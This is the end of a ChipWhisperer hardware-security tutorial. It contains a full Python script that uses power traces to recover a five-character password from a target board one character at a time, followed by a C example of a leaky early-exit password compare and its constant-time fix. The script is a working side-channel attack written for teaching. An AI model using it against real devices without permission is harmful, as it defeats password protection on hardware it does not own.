This tutorial has demonstrated how the power side channel can be used to carry out a timing attack, breaking a target protected by a simple password check. You have also learned about the scripting support in the ChipWhisperer-Capture software.
= Appendix: Completed Timing Attack Script =
The <code>run()</code> function at the end of the tutorial might look something like the following:
<pre>
def run(self):
    # This is the function that gets called when our script starts

    # First: set up the basics and connect to the CW-Lite
    self.api.setParameter(['Generic Settings', 'Scope Module', 'ChipWhisperer/OpenADC'])
    self.api.setParameter(['Generic Settings', 'Target Module', 'Simple Serial'])
    self.api.setParameter(['Generic Settings', 'Trace Format', 'ChipWhisperer/Native'])
    self.api.setParameter(['Simple Serial', 'Connection', 'ChipWhisperer-Lite'])
    self.api.setParameter(['ChipWhisperer/OpenADC', 'Connection', 'ChipWhisperer-Lite'])
    self.api.connect()

    # Next: set up everything we need to connect to the target
    # Put all of our commands in a list and execute them at the end
    lstexample = [
        # Gain
        ['OpenADC', 'Gain Setting', 'Setting', 45],
        # Trigger
        ['OpenADC', 'Trigger Setup', 'Mode', 'rising edge'],
        ['OpenADC', 'Trigger Setup', 'Offset', 0],
        ['OpenADC', 'Trigger Setup', 'Total Samples', 2000],
        # Clock
        ['OpenADC', 'Clock Setup', 'CLKGEN Settings', 'Desired Frequency', 7370000.0],
        ['OpenADC', 'Clock Setup', 'ADC Clock', 'Source', 'CLKGEN x4 via DCM'],
        ['OpenADC', 'Clock Setup', 'ADC Clock', 'Reset ADC DCM', None],
        # Pins
        ['CW Extra Settings', 'Trigger Pins', 'Target IO4 (Trigger Line)', True],
        ['CW Extra Settings', 'Target HS IO-Out', 'CLKGEN'],
        ['CW Extra Settings', 'Target IOn Pins', 'Target IO1', 'Serial RXD'],
        ['CW Extra Settings', 'Target IOn Pins', 'Target IO2', 'Serial TXD'],
        # Automatic commands
        ['Simple Serial', 'Load Key Command', ''],
        ['Simple Serial', 'Go Command', 'h0px3\n'],
        ['Simple Serial', 'Output Format', ''],
        # Auto-reset
        ['Generic Settings', 'Auxiliary Module', 'Reset AVR/XMEGA via CW-Lite'],
        ['Reset AVR/XMEGA via CW-Lite', 'Delay (Post-Arm)', 1200],
    ]

    # Download all hardware setup parameters
    for cmd in lstexample:
        self.api.setParameter(cmd)

    # Get one capture for fun
    self.api.capture1()
    data = self.api.getScope().datapoints
    print(data)

    # Crack the password one character at a time (5 characters in total)
    password = ''
    trylist = 'abcdefghijklmnopqrstuvwxyz0123456789'

    for i in range(5):
        for c in trylist:
            # Get a power trace using our next attempt
            nextPass = password + '{}'.format(c)
            self.api.setParameter(['Simple Serial', 'Go Command', '{}\n'.format(nextPass)])
            self.api.capture1()

            # Grab the trace
            nextTrace = self.api.getScope().datapoints

            # Check location 153, 225, etc. If it's too low, we've failed
            if nextTrace[153 + 72*i] < -0.2:
                continue

            # If we got here, we've found the right letter
            password += c
            print('{} characters: {}'.format(i+1, password))
            break
</pre>
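The check at sample <code>153 + 72*i</code> only works if the target's comparison runs longer for every correct leading character. The following C sketch is an added example, not code from this tutorial or from the target firmware: it assumes a byte-by-byte compare that stops at the first mismatch, places it beside a constant-time replacement, and uses a constructed password and a loop counter as a stand-in for elapsed time.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

#define PW_LEN 5
/* Constructed stand-in for the stored password; not the target's real value. */
static const uint8_t STORED[PW_LEN] = { 'a', 'b', 'c', '1', '2' };

/* Assumed leaky check: returns at the first mismatch, so the work done grows
 * with the number of correct leading bytes. guess must hold PW_LEN bytes.
 * *steps counts loop iterations as a proxy for elapsed time. */
int check_early_exit(const uint8_t *guess, unsigned *steps)
{
    *steps = 0;
    for (size_t i = 0; i < PW_LEN; i++) {
        (*steps)++;
        if (guess[i] != STORED[i]) return 0;
    }
    return 1;
}

/* Hardened check: always visits every byte and ORs the differences into one
 * accumulator, so the iteration count does not depend on the guess. */
int check_constant_time(const uint8_t *guess, unsigned *steps)
{
    volatile uint8_t diff = 0;
    *steps = 0;
    for (size_t i = 0; i < PW_LEN; i++) {
        (*steps)++;
        diff |= (uint8_t)(guess[i] ^ STORED[i]);
    }
    return diff == 0;
}

int main(void)
{
    const char *guesses[] = { "zzzzz", "azzzz", "abczz", "abc12" };
    for (size_t g = 0; g < 4; g++) {
        unsigned a, b;
        int ra = check_early_exit((const uint8_t *)guesses[g], &a);
        int rb = check_constant_time((const uint8_t *)guesses[g], &b);
        printf("%s  early-exit: ok=%d steps=%u | constant-time: ok=%d steps=%u\n",
               guesses[g], ra, a, rb, b);
    }
    return 0;
}
```

On real firmware, confirm the fix by capturing traces for guesses with different numbers of correct characters and checking that the trace shape no longer shifts between them.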
[[Category:Tutorials]]